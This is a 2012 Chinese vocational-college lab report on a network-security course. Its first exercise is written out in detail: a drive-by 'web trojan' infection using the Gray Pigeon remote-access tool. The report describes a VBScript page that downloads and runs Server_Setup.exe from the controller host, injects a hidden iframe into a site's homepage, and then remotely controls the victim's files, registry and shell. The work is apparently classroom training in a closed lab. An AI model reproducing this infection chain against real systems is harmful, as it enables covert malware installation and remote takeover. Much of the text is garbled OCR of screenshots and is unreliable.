網(wǎng)絡(luò)安全基礎(chǔ)實訓報告

蘇州市職業(yè)大學實習（實訓）報告名稱 網(wǎng)絡(luò)安全基礎(chǔ)實訓2012年6月20日至2012年6月22日共1周院系 計算機工程系班級10網(wǎng)絡(luò)安全（CIW）姓 名胡帥帥系主任 李金祥（教研室主任 譚方勇指導教師肖長水方立剛蘇州市職業(yè)大學]實習（實訓）任務書名稱： 網(wǎng)絡(luò)安全基礎(chǔ)實訓起訖時間：2012年6月20日至6月22日院系： 計算機工程系 班級：10網(wǎng)絡(luò)安全（CIW）指導教師： 肖長水方立剛）系主任： 李金祥 、實習（實訓）目的和要求二、實訓說明：本次實訓使用信1-510信息安全實訓室的“網(wǎng)絡(luò)信息安全教學實驗系統(tǒng)”實訓中所涉及主機名和IP地址應該用實訓中實際使用的主機名和IP地址代替；根據(jù)實訓過程，完成實訓步驟中所需填寫的內(nèi)容；實訓結(jié)束，對本次實訓過程寫一份實訓總結(jié)。）實訓一網(wǎng)頁木馬【實訓目的】剖析網(wǎng)頁木馬的工作原理理解木馬的植入過程學會編寫簡單的網(wǎng)頁木馬腳本通過分析監(jiān)控信息實現(xiàn)手動刪除木馬【實訓人數(shù)11每組2人【系統(tǒng)環(huán)境】Windows【網(wǎng)絡(luò)環(huán)境】交換網(wǎng)絡(luò)結(jié)構(gòu)【實訓工具】灰鴿子木馬監(jiān)控器工具網(wǎng)絡(luò)協(xié)議分析器【實訓原理】見網(wǎng)絡(luò)信息安全教學實驗系統(tǒng)I實驗26I練習一。實訓二明文嗅探【實訓目的】了解明文嗅探能夠利用嗅探工具獲取郵件賬號了解Base64編碼應用【實訓人數(shù)】每組2人【系統(tǒng)環(huán)境】Windows【網(wǎng)絡(luò)環(huán)境】》交換網(wǎng)絡(luò)結(jié)構(gòu)【實訓工具】Base64轉(zhuǎn)碼器網(wǎng)絡(luò)協(xié)議分析器【實訓原理】見網(wǎng)絡(luò)信息安全教學實驗系統(tǒng)I實驗21I練習一。實訓三Web漏洞掃描器【實訓目的】了解漏洞掃描原理設(shè)計一個簡單Web漏洞掃描器【實訓人數(shù)】每組1人【系統(tǒng)環(huán)境】Windows【網(wǎng)絡(luò)環(huán)境】交換網(wǎng)絡(luò)結(jié)構(gòu)【實訓工具】VC++網(wǎng)絡(luò)協(xié)議分析器【實訓原理】見網(wǎng)絡(luò)信息安全教學實驗系統(tǒng)I實驗20I練習三實訓四Outlook郵件病毒【實訓目的】了解郵件型病毒的傳播方式了解郵件型病毒的工作原理掌握郵件型病毒的殺毒方法【實訓人數(shù)】每組2人"【系統(tǒng)環(huán)境】Windows【網(wǎng)絡(luò)環(huán)境】交換網(wǎng)絡(luò)結(jié)構(gòu)【實訓工具】MicrosoftOutlook2003MicrosoftWord2003【實訓原理】見網(wǎng)絡(luò)信息安全教學實驗系統(tǒng)I實驗35I練習一。實訓五PGP應用【實訓目的】學會利用PGP工具實現(xiàn)安全通信解安全通信實現(xiàn)過程【實訓人數(shù)】每組2人【系統(tǒng)環(huán)境】Windows【網(wǎng)絡(luò)環(huán)境】交換網(wǎng)絡(luò)結(jié)構(gòu)【實訓工具】GnuPG》【實訓原理】見網(wǎng)絡(luò)信息安全教學實驗系統(tǒng)I實驗9I練習二。實訓六Windows2003防火墻應用【實訓目的】了解防火墻的含義與作用學習防火墻的基本配置方法【實訓人數(shù)】每組3人【系統(tǒng)環(huán)境】Windows【網(wǎng)絡(luò)環(huán)境】交換網(wǎng)絡(luò)結(jié)構(gòu)【實訓工具】UdpToolsWindowsServer2003系統(tǒng)防火墻-網(wǎng)絡(luò)協(xié)議分析器【實訓原理】見網(wǎng)絡(luò)信息安全教學實驗系統(tǒng)I實驗27I練習一。二、實習（實訓）內(nèi)容實訓一網(wǎng)頁木馬【實訓步驟】＜本練習主機A、B為一組，C、D為一組，E、F為一組。實訓角色說明如下:實訓主機實訓角色主機A、C、E木馬控制端（木馬客戶端）主機B、D、F木馬被控端（木馬服務器）下面以主機A、B為例，說明實訓步驟。首先使用“快照X”恢復Windows系統(tǒng)環(huán)境。一.木馬生成與植入在進行本實訓步驟之前，我們再來闡述一下用戶主機通過訪問被“掛馬”的網(wǎng)站而被植入木馬的過程，便于同學們理解和完成實訓。（1）用戶訪問被“掛馬”的網(wǎng)站主頁。（此網(wǎng)站是安全的）（2）“掛馬”網(wǎng)站主頁中的＜iframe＞代碼鏈接一個網(wǎng)址（即一個網(wǎng)頁木馬），使用戶主機自動訪問網(wǎng)頁木馬。（通過把＜iframe＞設(shè)置成不可見的，使用戶無法察覺到這個過程）（3）網(wǎng)頁木馬在得到用戶連接后，自動發(fā)送安裝程序給用戶。~（4）如果用戶主機存在MS06014漏洞，則自動下載木馬安裝程序并在后臺運行。

(5)木馬安裝成功后，木馬服務端定時監(jiān)測控制端是否存在，發(fā)現(xiàn)控制端上線后立即彈出端□主動連接控制端打開的被動端口。(6)客戶端收到連接請求，建立連接。.生成網(wǎng)頁木馬(1)主機A首先通過Internet信息服務(IIS)管理器啟動“木馬網(wǎng)站”。如圖1-1所示:右擊木馬網(wǎng)站，點擊“啟動”即可。tInternet信息?多(U5)管理察文件(日操作(目查看M盲口(此幫助回牛才|包國|X商用，口四|星|「■描逑|標識符|狀意修跋送網(wǎng)站1正在運行招網(wǎng)站19L167S243正在運行44339Z3B2已后工再正常網(wǎng)站(離口622792767已冷_L通釣魚網(wǎng)站(停11)94444104Z已冷_L圖1-1：啟動木馬網(wǎng)站甲htc-ncl:信息服第—-七比2,式=地計算機;4」FTP玷一占4」應用程序池+」的%」胃北眠箔F展》(2)主機A進入實訓平臺在工具欄中單擊“灰鴿子”按鈕運行灰鴿子遠程監(jiān)控木馬程序。如圖1-2所示：圖1-2圖1-2：運行灰鴿子遠程監(jiān)控木馬程序(3)主機A生成木馬的“服務器程序”。主機A單擊木馬操作界面工具欄“配置服務程序”按鈕，彈出“服務器配置”對話框，單擊“自動上線設(shè)置〃屬性頁，在“IP通知http訪問地址、DNS解析域名或固定IP”文本框中輸入本機IP地址，在“保存路徑'文本框中輸入“D:\Work\IIS\"，單擊“生成服務器〃按鈕，生成木馬“服務器程序”。如圖1-3所示：

保存踣徑:口：帆工同［￡4""_￡"9"4口［自勃上畿設(shè)置］安保存踣徑:口：帆工同［￡4""_￡"9"4口［自勃上畿設(shè)置］安井選項啟動項設(shè)置代謝員普高如選項捶件功是匚通知i.tpfcJlW地址、口非蓋析自名或因Wir；2SJpT?IE.532^2T周i＞配甲f哥器程序成功卜叱分在接密歷史自己提示信息%圖1-3：生成服務器端程序（4）主機A編寫生成網(wǎng)頁木馬的腳本。在桌面建立一個“”文檔，打開“”，將實訓原理中網(wǎng)馬腳本寫入，并將第15行“主機IP地址”替換成主機A的IP地址。把"”文件擴展名改為“.htm”，生成“〃。如圖1-4所示：IV，-自建AdMh一葉皿n引司.滬上三用二下IV，-自建AdMh一葉皿n引司.滬上三用二下7茁明小:建方.實現(xiàn)對施的誘、寫等操作->Setadlo￡-df.createObjt(^iSidocilb=StreansitHiS>adlos.tippe-1<1—使用HTTPGET初如tHTTP請求url-B,http=/7172 .58-232：W?i3/Serwr_Sftup-exe-閨hJpen urlBFalsey一發(fā)送HTT喑琳，并聯(lián)取HTTPil向應->MlhsSend、…I.，-；r；.^si：i-i|ir 專區(qū)耳三門系筑EetFs■dF.creat^Ot]ject(Scripting.FileSjj5tenObject1"a1119)仃二汽建川ihttp.-、|身，用主三蟲.；［此始包二%"“，，"|濘.內(nèi)酢譏以亨芯“y」MTMil-Il4-.I：|-|-,|1rflhiri:1C'llii:rir.nrr.^lllHTIP","")文件㈤編鐲以格式回 祁蛔Tro］mJT就-理事聿圖1-4：編寫生成網(wǎng)頁木馬的腳本「注」C:\ExpNIS\NetAD-Lab\Projects\Trojan\文件提供了VB腳本源碼。將生成的””文件保存到七:\^0米\15\"目錄下（"D:\Work\IIS\”為“木馬網(wǎng)站”的網(wǎng)站空間目錄），“”文件就是網(wǎng)頁木馬程序。如圖1-5所示： & I修D(zhuǎn):\WQrk\IIS文件（日編輯但查看⑼收藏回工具（D幫助（WQ后退▼G?t|?搜索由文件夾|偉爵XR|㈢’地址?|OD:\Work\II5名稱- 1 大小1類型 1回時忤門了.9 63MR 口寸守件■&jindej.html 1KB HTMLDocument5erver_5etup.exe 744KB 應月程序■fejthunder.htm 3KB HTMLDocument旦］upFik■，口印 13KD AD「文件■&jxsstestl.html 1KB HTMLDocument■&jxsstest2.html 1KB HTMLDocument題蹦MIMI 2KB HTMLDocument圖1-5：保存生成的””文件.完成對默認網(wǎng)站的“掛馬”過程（1）主機A進入目錄“C:\Inetpub\wwwroot”，使用記事本打開“”文件。（“默認網(wǎng)站”的網(wǎng)站空間目錄為“C:\Inetpub\wwwroot\"，主頁為“”）（2）對“”進行編輯。在代碼的底部加上＜iframe＞語句，具體見實訓原理I名詞解釋Iiframe標簽（需將修改為，實現(xiàn)從此網(wǎng)頁對網(wǎng)頁木馬的鏈接。如圖1-6所示：f.indsM.htmlm字本BTialxi文忖舊si密⑹格式⑨astyj糖幀Dsize: line-heiglht:12pt;Fomt-sije-aiaJuist:nciwe;Font--1stretch;normal;cclcr;bl或k’,》蹙訪問IIS幫助《開untAW/hS〉<d1> '"IcFontstyle-"fnnt-faBilii:宋體；Font-stylE：norm;fnnt-uariant;no^nnail;Font-則eighteofirmal;font-sizet$pt；lineheight;12pt;Font-size-adljijst;none;font-stretch;normal;CDlor;bldclk;ah><liid=，uIIeH,。單擊他》開始《外'然后單擊《通運行山加,,UuillRtK》在O打開"n文本框中q耀人<lb>irjetAgr</b>,招出現(xiàn)ns管理器.id="bulled少.<h>幫助"一菜單,單擊他》幫助壬題“h九(7-11in-'Wilet￥,)單擊小Tint信息服務《油)。5心</tr><ifraraesrc-^http://172=iBa￡8,232:909Trojanahtio111nmme-Hjlics^1111ujidlith^ldftfight-tlframpbrarder?B)- -圖1-6：對“〃文件進行編輯.木馬的植入(1)主機B設(shè)置監(jiān)控?！鲋鳈CB進入實訓平臺，單擊工具欄“監(jiān)控器，按鈕，打開監(jiān)控器。如圖1-7所示:

圖17：主機B打開監(jiān)控器在向?qū)谥幸来螁印斑M程監(jiān)控”、“端口監(jiān)控”，選擇“文件監(jiān)控”，在菜單欄中選擇“選項”I“設(shè)置”，在設(shè)置界面中設(shè)置監(jiān)視目錄久:\^向0川$\"（默認已被添加完成），操作類型全部選中，啟動文件監(jiān)控。如圖18啟動文件監(jiān)控。如圖18所示:圖18:設(shè)置監(jiān)視目錄和操作類型啟動協(xié)議分析器，單擊菜單“設(shè)置”1“定義過濾器”在彈出的“定義過濾器”對話框中選擇“網(wǎng)絡(luò)地址”選項卡，設(shè)置捕獲主機A與主機B之間的數(shù)據(jù)。如圖19所示：%

%圖1-9：定乂過濾器中的網(wǎng)絡(luò)地址

新建捕獲窗口，點擊“選擇過濾器”按鈕，確定過濾信息。在捕獲窗口工具欄中點擊“開始捕獲數(shù)據(jù)包”按鈕，開始捕獲數(shù)據(jù)包。如圖1-10所示:選拜過的褐過濾器附地址過逵地址類型:-Pv4掙蘇卡式：空型選拜過的褐過濾器附地址過逵地址類型:-Pv4掙蘇卡式：空型172.10.53,231 172.10.50,232圖1-10：確定過濾信息主機B啟動IE瀏覽器，訪問“主機A的IP地址”。（2）主機A等待“灰鴿子遠程控制”程序主界面的“文件管理器”屬性頁中“文件目錄瀏覽樹中出現(xiàn)“自動上線主機”時通知主機B。如圖1-11所示：女件!11使置女件!11使置國J工及口）蹌8Mk^V9t營密圜學學一國日扇上電！修麗森區(qū)解,t營密圜學學一國日扇上電！修麗森區(qū)解,Ttlrrtr配餐鞭為世客用小牝ifittiS3會dlX_f4商DD?■L5電后卸工3tED 族強犍!：（SffBrFiTK『'i舌的電畸牧民戰(zhàn)天王見CSK?^KCifi-V自掘破'rttt1■aaMTTBtSMi.flXVaHflUiniKESMT.Il”:領(lǐng)）圖1-11：主機B上線（3）主機B查看“進程監(jiān)控”、“服務監(jiān)控”、“文件監(jiān)控”和“端口監(jiān)控”所捕獲到的信息。在“進程監(jiān)控”1“變化視圖”中查看是否存在“進程映像名稱”為“的新增條目。觀察進程監(jiān)控信息，結(jié)合實訓原理回答下面的問題。（存在）如圖1-12所示：

201Z^-Z016：36：5qIlffiS 364a 1□nd,日用1CAWtFJDO^systBrnlZ^md.eMe I初衣6m1&37口口: |21衛(wèi) MoritE4\exeUEKhJ^lr^AD-LaMT口d割EaH讓口三0口|11人10日上口~.EHE ZOIZ^-ZD16：<10!4E.工廠NEWiBlFHEreWE匚:正:中所5'iN0tAD』mblT口d丸AndYzaAPJatfinalyMrlNE^rialyzEf.exE：anWY-EOi6:-=IL：29112awniprvte.&xeU；m'『IDCiW^ystend2VxbsnUwrrig總e工日EtllM-Efl16H3:617律場20[EXPLWE.EXECijprnor.amR匕加ntecnet￡加口「叫E啦UREEXEaHZT-2016舊3：獷190窿! 「綱整 riricqh.feja白欣:CUMEa4111ACHIMI7LLCCftLS^HWmpMrikqln.weEfllM-203旬9：—[EMPLOYE.DIECi^frag-amFifesyintErnetExplurEJE用LCiRE.EMEZDIZ^-ZD16N3!Z1，燎用.叫「!二庚 LLCaLS-llT日叩】曜11103田EM團餃團16書:22’T室的”Hecker.匚口m.e.i|圖1-12：查看進程文件是由哪個進程創(chuàng)建的：C:\WINDOWS\在“服務監(jiān)控”中單擊工具欄中的“刷新”按鈕，查看是否存在“服務名稱”為WindowsXPVista”的新增條目，觀察服務監(jiān)控信息，回答下面的問題。（存在）如圖1-13所示:MTTHJTlk_LWmiXmiAp5rvKUfiLBEfU■xzcsvcWindoms^PiJst...Mndov-hlsTjageiTiEritMTTHJTlk_LWmiXmiAp5rvKUfiLBEfU■xzcsvcWindoms^PiJst...Mndov-hlsTjageiTiErit[ns口..壬在運行WindawsMsriaqefrer^[m...i$_t15Td[REtfCrgT"(l叩ter 停止_AutExnatcUpdates時「謝EQrfkjJr的[m 手在運行Mflt'ErkPrwi曲nngRtt防停止Wndwis^PUstaRft動動a動Rh動

自手手自目手自匚LWlhCOVi1正.CXWINDW叱0U洶枕即曬而一匚:jWJh￡iW血rsfcan32Hrd?匕e工…□IW1NDW形設(shè)即i32帕時E：..□MdHDOV1gESE宏iFrthcetme.提供共確昴面耐衣但這以便訪問有關(guān)博性制學上-制恂日成用干登WndoijMSMar^qefrert[ndtrurrent...A忡1型4歸可k可±rrdrurrfint^knCWTj15供程…死許下朝并左轉(zhuǎn)V*nd口融更新.如果比U老爸祟用…后用山頌百配血目動肥良：.如梟此國若際…在陸內(nèi)行自動硝提供營理:州L辱文件.買困于眼雷/程序.歷程覽甑理;圖1-13：查看WindowsXPVista服務WindowsXPvista服務的執(zhí)行體文件是：；在“文件監(jiān)控”中查看“文件名”為“C:\WINDOWS也新增條目。如圖1-14所示:F[LE_ATTR[E[EIPLORE.EJiE 匚:)UHPJ□匚iW5L￡y5tEFn32(mhtml.Z[LE1ATTR[B-jDtPLORE.EME" 一心MWDW5⑶ dlFILEATTREB[EXPLORE.EMEC:^[NDOV5^ystErri32\m5htm.dll=ILE_ArTR[B[EXPLORE.E^E-■\(/TJrj-.W5,^q-ii.VuiiVi-ii.IIHLE_ATTR[B[EKPLORE.EXE科EtmTS3nm沖1cf1RLE_ATTP,[E：[-,■.inlDgri.BKB二「胃二NEC%⑸HWjcwncr.rirleZmcofy同川口口卜帝匕C;W[NDOW5lH.riMZPF[LE_ATTR[BiMnlDgri.BKBC'WTJIJ.W-.,HAr^r.rrnrr.riF1LE_ATTR[BMnlDgri.BKBL:]WCNDDWSlHacker,.riFILE_ATTR[BSystem：;'\<rJD>/：,lladjc-r.ccncr.ri圖1-14：查看C:\WINDOWS\在“端口監(jiān)控”中查看“遠程端口”為“8000”的新增條目，觀察端口監(jiān)控信息，回答下面問題：如圖1-15所示：ww1連壁狀袍1本中地址本地耀口1本地用口名徘1國心眥 1運港跳口歷上保□名次進程端導1進在后禰E57ABLBHEDL?Z,L0,M,Z3]J01317E.1B,50.E3E000035&+口LFroq由EFilKUrternetEkd口rer\]…L1詡CzljPragramRles^lriefnetEkplnrer\i...LISTENINGo.n.n.a21 Ftpa.o.o.o■L556LI/NlJJj 111rletsrMmt,..LT5TEMNGO.D.D.O23 tetieta.o.o.o一L&50ULWUJDWS^y浜m3211dLT5TEMN后以。00 Htpa.o.o.o4L40uiwwiow*皆的行定&式卜止3中㈤LI5IEMINGOiD.DiDJ35 azrap□.0.0.0rfa雙匚dwiPJDSV電y總2:運匕1/dn史exrLISTENINGQ.D.D.aWHG mnc'scfir-dsa.a.o.o■-1[System]圖1-15：查看“遠程端口”為“8000”的新增條目8000服務遠程地址（控制端）地址：經(jīng)過對上述監(jiān)控信息的觀察，你認為在“進程監(jiān)控”中出現(xiàn)的進程（若存在）在整個的木馬植入過程中起到的作用是:_迷惑管理員，使安裝過程及其留下的痕跡不通過細心查看不易被發(fā)覺;（4）主機B查看協(xié)議分析器所捕獲的信息。注意圖1-1中劃線部分的數(shù)據(jù)，結(jié)合實際結(jié)果找到對應的信息。如圖1-16所示：

OpDl9-900Bl293A-2JL￡員2965ACIEOpDl9-900Bl293A-2JL￡員2965ACIE625』SBOCB6kJ0CFUDDOOOOOUDDO32OO7276657E3739302EiD3129ODoo口口aooooodooo□□00DOOO□□73了胃36qq□orioooon口口00oo口口□□□□DO□□□□□□□□□□□□□□□□□□□□□□□□□□40DO89 2*□￡OQ相OU3AE73lC129FA45口13CFIFD6F700OD00OO00OD5T692092303053657216DOCDQQ□□000□000000OD000000OD000000OD0000DOOD00no□000OODO□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□■d->>*Hris.1ij-ii.IW?l日.g?Ml_.Si.P?<iETZTTDjan.4licttiHITPZ1.4Ji.?Accept:u?ge/gbtf皿工舊腓門KD.app1irfliti口n/iwwjTcbappliawfcioEi/'M-H-lLOCJCFaVtt-fImIl,1/1r.Fer?i?ir;116C；P；//17Z,BfLMA32.?jlLC?epT-lrBajguB.QE；utL-^D.rU&-GPUJ?iSS..IcoepT-ETicocLnngigElpPletlaw?i<L5er-Jig?n^=沖421；1雨日-中rG?wp<&itle;H3II&.□;Mln曲rMT 4nIl,,11QBts 16..M.33古;$090..<oTiT>eat：i□n： 3VB..r,) ..Er--I[!,2..：l；*ju-Eu..+3-i.： ■5-00?■?+,C-I-j5-i-<￡1.RSS:1；.P?：&?,?P"3獷L?F?&ETJ5utave1G￡T￥ItijdbSEp.uxuHTTP^ues/pwercar.Accept?叼gifHTTP/1.1..AC匚fu：xbs--ueRi：rt/*..Reier-incodiHgs「門Jltrf?//17Zr1deflate__Sr-SQ.ZSZr.Acceptgent:Mdci-Lavage：□(ccanpati--^-CPD:xBS..A3I￡6fc0;ffcfEcpt-lDEdillng"MTUS031:172-132；gO9O.aC工till：Eteep-S3L，口

6563747665ODqzlprdtClarE..ITser-Agent:Hozzl1h/4-Q(compHtzhIe;H3I￡6uO;UindnuBNT562;3V1).uHoat:172?10□56u2:3￡?.ConoECtldil;Eeep-11ive?圖1-16：協(xié)議分析器捕獲信息二.木馬的功能.文件管理(1)主機B在目錄照:做0米\丁阿1四'下建立一個文本文件，并命名為“”如圖1-17所示:圖1-17：主機B創(chuàng)建“”(2)主機A操作“灰鴿子遠程控制”程序來對主機B進行文件管理。[單擊“文件管理器”屬性頁，效仿資源管理器的方法在左側(cè)的樹形列表的“自動上線主機”下找到主機B新建的文件“D:\Work\Trojan\"。在右側(cè)的詳細列表中對該文件進行重命名操作。如圖1-18所示：（3）在主機BD2\V/orik\Troji3n五件目錄網(wǎng)is 國□箭自動上俎主杭 ±S9H?tBD目-■C.-D-白口florb國國團場霹搜索融國【咤」原索內(nèi)號; 自動上墳主機更有名專G發(fā)話血功I文韓劍貴■嚎K畢.1T：OO：S3白勺-IQanQpY廣Ebfc&町電.&■田總工圖1-18：對文件進行重命名操作上觀察文件操作的結(jié)果。如圖1-19所示：文件婦編轆日查若CQ?收枝面工具①幫助時。后國?◎?蕾|(zhì)Q烈案◎三件夾|防沙M4|圖，gj5hui3i5hjai.txt：OK0文本交檔2D126-￡016:57圖1-19：主機B上觀察文件操作的結(jié)果.系統(tǒng)信息查看單擊“遠程控制命令”屬查看主機B操作系統(tǒng)信息。主機A操作“灰鴿子遠程控制”程序查看主機B的操作系統(tǒng)信息。單擊“遠程控制命令”屬查看主機B操作系統(tǒng)信息。性頁，選中“系統(tǒng)操作”屬性頁，單擊界面右側(cè)的“系統(tǒng)信息”按鈕，如圖1-20所示:MI1ST-KTIsr^TiBgOL±-B-MIII：S3:22H?工曲amniimL^j工目計劃機文件（E）世匿&）工具B裕附如餐用計境茂嘉需■工勵屆Tin^.*VER桂閽愛司:部翻受需藪信息< ￡,等血辱啜自動上嬲件底屏高 t酬語青 Telnri. 匣*服名程序 玨小牝浪出當節(jié)性展-吊嬴而 電店名舟.|H^tii-H 迪接密防：洲駛.閥HUML播信班IIqjIws3在早虹也叫1口3.E喧1＞可￡口＞.3虹91E曾JT?okSJCAlTTliDlS\3￡WBP前用尸圖1-20：查看主機B操作系統(tǒng)信息.進程查看(1)主機A操作“灰鴿子遠程控制”程序?qū)χ鳈CB啟動的進程進行查看。單擊“遠程控制命令”屬性頁，選中“進程管理”屬性頁，單擊界面右側(cè)的“查看進程”按鈕，查看主機B進程信息。如圖1-21所示：圖1-21：查看主機B進程信息(2)主機B查看“進程監(jiān)控”1“進程視圖”枚舉出的當前系統(tǒng)運行的進程，并和主機A的查看結(jié)果相比較。如圖1-22所示：圖1-22圖1-22：查看主機A的進程信息laJrin進昌名彝IEFPC<E53hlanitar.EM-:非工網(wǎng)嶼怔1比14_^^00的一：以51面虹口的上流OK8LECH7F8Si'stenterndFtdcsmOML7BW7EOsn?rw115g31*啟0751552>即M審5口耽腦536ULWINO口幀*應叫冽』的.MSUffiL306SI6?■磊egan.ee：匚J；MTJDCiiiW%r4t5弭亡后0K3L3HD88sanfcw.ErfeC：i；iJJirC0i1Wi^i^tm32i1MfijrM.?ct0K8L2FJCCH匚mUO0帕什刖rm刈)5設(shè)w:，:口0K&LZF+Z5Pvnacthlp^KB Sm?二:舊WarnF4w]拙立巧”.TeN卜eEHIpmswUSL2LB308L：E1NO口后原明邕科加乳國羽。需L2爾Sfl匚L'MTJDCiiiW%國5英如也1■出討.上證OKSLZKCOJIE日C:i內(nèi)UJD0WS1下網(wǎng)m3S(5vd>ast,semONSLEBSCCDfl.cjeJCH1C：iwUC0m&■博ETl過115VdTOSt,ExeOJ?LZ?'AaAB冊■dlEfcflOE]?&L：M1f￡iug國ftanOt\s.-rTh口止4fr麗2MG0riVdtC.AnS-13S2匚l；MT。Ci陋If同5支而wdtJ0M8L33m：=：AS'WLSVC.m]soq匚何ILDCii^ik網(wǎng)em斕SVnSVC.exE0KSLZID3SirfiUrf&nexe-C:(wife05回mwn科nrt5MjnrtnFaor0M=FHB2CCB的求e1776i二4泗INOQW5回nE卸iML律OMFF5B6D00drtsvr-eas1S60□EINO口帕6淳明汨1r『03%日口肝MknlUkd.AA-ii整日匚爐pqtHTiF&liiTM4■皿UHhN■白丁口^卜制比口＞%1白球CiMFFSRDSflErtl[KtUMI山口加國15比而出孰tl&*本注0KFF530D38VMLtu-adeliHpefC:U=TocraTiri?'i11Tliwarp\UMr+s-ElwfpiTTJpgradeHet*i-0江O^r5K5EO?二TWINS□由SeyrtefZ空,卜咐0H口疔國心值?drust.HXBUEINO口帕囪牡璉前口卜攻必9UW50P3I0lOJg匚|；加jd口心回i即日加g..庭CiMFFTFFD俯e:q:4a■廿:班七C：i.WirCOiiWi^xrJMr.DEOKFF1EOKDUMHa-eLbWieM-⑼口匚：l1ProflFErhHvHTMr+s-elookViTlrHreUsE.eKEo^rr-Rcrsso出griE用翎日L：E1NO0*iV5&AE Fmon.口肝小AM曬工小免日期.K52L：E1NOD帕Isrtt附■冽/511MgV5$田羽。用TSAS怙『Mjjtre37BBC.I|FlCMaYiFfei,iH：j.5.D1日口占亡CiMFPIMKSEXPLORE.EXE3aqC：l,ProQrariFfe^ilrterwtE-pk)rerVEXPLOF￡.E^EO^F3F3B1B主機主機A單擊“注冊表編輯器〃屬性頁，“HKEY_LOCAL_MACHINE\Software\”鍵下，.注冊表管理在左側(cè)樹狀控件中“遠程主機”(主機B)注冊表的

創(chuàng)建新的注冊表項；對新創(chuàng)建的注冊表項進行重命名等修改操作；刪除新創(chuàng)建的注冊表項，如圖1-23所示，創(chuàng)建了新項“rongrong”，主機B查看相應注冊表項，如圖1-24所示：成功創(chuàng)建了新項“rongrong”。

目前追掛:Hwt6H片前叱一joc*□K|CanedI圖1-23：主機A在主機B上創(chuàng)建新項iS-LJG的砒jfr-Ol北C55\由?口Mkcmu加gLJMasterSoft；&￡j必；ffi-ClMicrosoftj周口OCBC；hCjCperMAljj-PloperWPPd-GUl：g-LHPcLaver目前追掛:Hwt6H片前叱一joc*□K|Caned!」Perl

jffi-PlPohdas

；；-l1ProQrano&■口叩5

\@OSchlurrtierger

：i-C1Secure

；ffi-ClSystEffl53fetv

：國??口rhrPrrt

：EQjVM/iareiIncD

\ winPcaprananona?irr口i-_|H讓t_U5ERq-_|HKF-_riR^FM_L-Cj^J=r.irongrong圖1-24：主機B上多了新項“rongrong”rongrong5.Telnet主機A操作“灰鴿子遠程控制”程序?qū)χ鳈CB進行遠程控制操作，單擊菜單項中的“Telnet”按鈕，打開Telnet窗口，使用“cdc:\"命令進行目錄切換，使用“dir”命令顯示當前目錄內(nèi)容，如圖1-25所示，使用其它命令進行遠程控制，如圖1-26所示：用systeminfo命令查看主機B的操作系統(tǒng)信息。片鼻端C中的港沒有標蛇口 T翻嚀于月是B8AL-n]D>：r4E4QT：3,.匚;Vmnn⑻=y=tHii32>c4門c-dCSCS：NirC：'i.的目錄0AinOEIEC.BA7UCOK7I&.SYSDcic-inAnt-E皿1￡?tti口交Er2ns _Iju-ub2SSProbeLofiwiProgrm--FjlesVDfKlVE：vnpuh-Jb字至

ITE,HE可用宇節(jié)圖125:用“dir”命令顯示當前目錄內(nèi)容C:L^￡ys.tM^nfoLyslepixita主ffics田的LI5注*初錄方案耒如.?/■;商」入：期間：

瓦細日時商Mostar主ffics田的LI5注*初錄方案耒如.?/■;商」入：期間：

瓦細日時商MostarKl'ZTDscEt(RjiVindoTiIj.)5.Z.3790Sor-ndceFdck1NlctD￡.oEtCorpcr-atlok歌交服勞福ITidprocssEQirFre4HDST-NEVKServer如03，EntcrprLieEdiiLonEunldJ79D岫二BIOS版超_lYandovE目錄:裁境目錄-69E：]3-54￡>935639^-45q3520：6^-￡118：55：-H20天0小時50a41秒VIMirUjIjlc.Wliii'ATeVirtualFlitfanriH0B-^3rdFC安裝了L個處理器口[OL]iffiFflnily6Vlad0l23》鈾pin&10GbriULUAlut4!^2992I3THL-BDAOMOc'sYnmowsCSVIND0WS\3rrier326.6.制其它命令及控制主機A通過使用。如圖127所示：圖126:查看主機B的操作系統(tǒng)信息“灰鴿子遠程控制”程序的其它功能（例如“捕獲屏幕”），對主機B進行控4解I電購ELJ把1rLWS正Ef"T中口rt￡r_cufif!EMT_Li8ffi~CjHfr'J-iXfll_NACHTNEi13口l-WPJ?AWR￡l自口加QjiKURmj甲T IaQMV5「EH由□HErj.iSK.出口rt￡r_cufif!EMT_L.J'FK;一;㈣?:，圖1-27：對主機B進行捕獲屏幕三.木馬的刪除;.自動刪除主機A通過使用“灰鴿子遠程控制”程序卸載木馬的“服務器”程序。具體做法：選擇上線主機，單擊“遠程控制命令”屬性頁，選中“系統(tǒng)操作”屬性頁，單擊界面右側(cè)的“卸載服務端”按鈕，卸載木馬的“服務器”程序。如圖1-28所示:".；,學山,溥戰(zhàn)也目武-ISJH麗* 1”".；,學山,溥戰(zhàn)也目武-ISJH麗* 1”、1閉置5塔輕序t-ft'!—當；|ifasw口 ：1n-moiES^H；#*rt稹匚 畫whii 同W丁結(jié)桌；靠越;嗝飛|[?]件包會田注田*山畝的tt-riiEWE.<i?iIKc11sSwtw5.ZCTTW.-Strvlttr*tk13遙閉計地圖1-28：主機A卸載木馬的“服務器”程序.手動刪除(1)主機B啟動IE瀏覽器，單擊菜單欄“工具”["Internet選項”，彈出“Internet選項”配置對話框，單擊“刪除文件”按鈕，在彈出的“刪除文件”對話框中，選中“刪除所有脫機內(nèi)容”復選框，單擊“確定”按鈕直到完成。如圖1-29所示：

[圖1-29：刪除所有脫機內(nèi)容(2)雙擊“我的電腦”，在瀏覽器中單擊“工具”1”文件夾選項”菜單項，單擊“查看”屬性頁，選中“顯示所有文件和文件夾”，并將“隱藏受保護的操作系統(tǒng)文件”復選框置為不選中狀態(tài)，單擊“確定”按鈕。如圖1-30所示：圖1-30：顯示受保護的操作系統(tǒng)文件(3)關(guān)閉已打開的Web頁，啟動“Windows任務管理器”。單擊“進程”屬性頁，在“映像名稱”中選中所有””進程，單擊“結(jié)束進程”按鈕。如圖1-31所示：應用程序醒I應用程序醒I性33|聯(lián)網(wǎng)I用戶I映像名祐 用戶名 ICFUl內(nèi)存■使用一javw?revniprvseeievrnpma白上0IEIPL0FIEIEEt如口IL。見白javw?revniprvseeievrnpma白上0IEIPL0FIEIEEt如口IL。見白0X44H^Lar?r.rriloaLil4xetljitEvr.初gA5Y12E4JC4SySTEM^djnini3tra.tnrL0C肛3EEVTCEUETTORESERVICESVSTTMXdnLn.L￡trA.torAdninistritarIdmixd.etrttarsisnwi靠sumsisnwII0000口口0000口口00000000imt】心￥立nzdt{Z7ChjCS7clw正任第管理雪士有kkkkekkkeke^

